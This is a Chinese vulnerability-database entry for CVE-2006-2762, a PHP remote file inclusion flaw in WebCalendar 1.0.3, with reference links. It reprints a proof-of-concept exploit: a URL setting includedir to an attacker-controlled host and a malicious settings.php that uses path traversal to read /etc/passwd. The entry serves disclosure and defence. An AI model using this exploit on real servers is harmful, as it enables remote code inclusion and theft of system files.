WebCalendar config.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194751 漏洞类型 输入验证
发布时间 2006-05-31 更新时间 2006-06-13
CVE编号 CVE-2006-2762 CNNVD-ID CNNVD-200606-041
漏洞平台 N/A CVSS评分 6.4
|漏洞来源
https://www.securityfocus.com/bid/18175
https://cxsecurity.com/issue/WLB-2006060025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-041
|漏洞详情
WebCalendar1.0.3中的includes/config.php存在PHP远程文件包含漏洞,远程攻击者可通过在includedir参数中的URL(fopen调用中远程访问它,调用的结果是用来定义user_inc设置,该设置用于include_once调用中)来执行任意PHP代码。
|漏洞EXP
Version:    WebCalendar-1.0.3

Type:       Reading of any files

Description:

-----------------------------

includes/config.php:

line  64

if ( ! empty ( $includedir ) )

$fd = @fopen ( "$includedir/settings.php", "rb", true );

......

while ( ! feof ( $fd ) ) {

$data .= fgets ( $fd, 4096 );

}

$configLines = explode ( "n", $data );

for ( $n = 0; $n < count ( $configLines ); $n++ ) {

......

$settings[$matches[1]] = $matches[2];

......

$user_inc = $settings['user_inc'];

......

includes/init.php

include_once "includes/$user_inc";

Example:

---------------------------------------

index.php?includedir=http://attacker_host

where in attacker_host exists file settings.php , which content

"

<?php

echo '<?php

# updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300

Unimportant variables can be taken from original settings.php

user_inc: ../../../../../../../../../../../../../../../../etc/passwd

# end settings.php

?>';

?>

"

Requirements

register_globals = On;
|受影响的产品
k5n WebCalendar 1.0.3 k5n WebCalendar 1.0.2 k5n WebCalendar 1.0.1 k5n WebCalendar 1.0 RC3 k5n WebCalendar 1.0 rc2 k5n WebCalendar 1.0 RC1 k5n WebCalendar 1.
|参考资料

来源:VUPEN
名称:ADV-2006-2067
链接:http://www.frsirt.com/english/advisories/2006/2067
来源:SECTRACK
名称:1016179
链接:http://securitytracker.com/id?1016179
来源:SECUNIA
名称:20367
链接:http://secunia.com/advisories/20367
来源:BID
名称:18175
链接:http://www.securityfocus.com/bid/18175
来源:BUGTRAQ
名称:20060607Re:WebCalendar-1.0.3readingofanyfiles
链接:http://www.securityfocus.com/archive/1/archive/1/436263/100/0/threaded
来源:BUGTRAQ
名称:20060530WebCalendar-1.0.3readingofanyfiles
链接:http://www.securityfocus.com/archive/1/435379
来源:OSVDB
名称:25842
链接:http://www.osvdb.org/25842
来源:DEBIAN
名称:DSA-1096
链接:http://www.debian.org/security/2006/dsa-1096
来源:SREASON
名称:1019
链接:http://securityreason.com/securityalert/1019
来源:SECUNIA
名称:20542
链接:http://secunia.com/advisories/20542